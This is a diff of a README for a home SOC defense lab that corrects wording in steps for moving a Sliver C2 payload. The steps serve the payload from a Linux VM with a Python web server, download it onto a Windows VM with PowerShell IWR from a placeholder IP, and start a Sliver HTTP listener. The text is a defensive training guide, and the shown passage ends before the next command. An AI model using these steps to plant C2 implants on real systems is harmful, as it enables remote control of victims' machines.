AnthonySarmiento1/SOCDefenseLab/README.md

   <img src="https://imgur.com/GkvD1OS.png"/>

    <p align="center">
-To easily install this newly generated C2 payload from your Linux VM to your Windows VM is to start a temporary web server using python.Exit sliver and run this command:
+To easily install this newly generated C2 payload from your Linux VM to your Windows VM, start a temporary web server using Python.
+Exit sliver and run this command:
 <li><code> python3 -m http.server 80 </code></li>
 <p align="center">
 Open up your Windows VM and download your C2 payload from that temporary web server by opening up an Administrative PowerShell console, and using this command:
-<li><code> IWR -Uri http://[Your LinuxVM IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe </code></li>
+<li><code> IWR -Uri http://[Your Linux VM IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe </code></li>
 <p align="center">
-Swapping back to your Linux VM relaunch Sliver and start a HTTP listener.
+Swapping back to your Linux VM relaunch Sliver and start an HTTP listener.
 <li><code>http</code></li>
 <p align="center">
 Back in your Windows VM use this Administrative PowerShell command: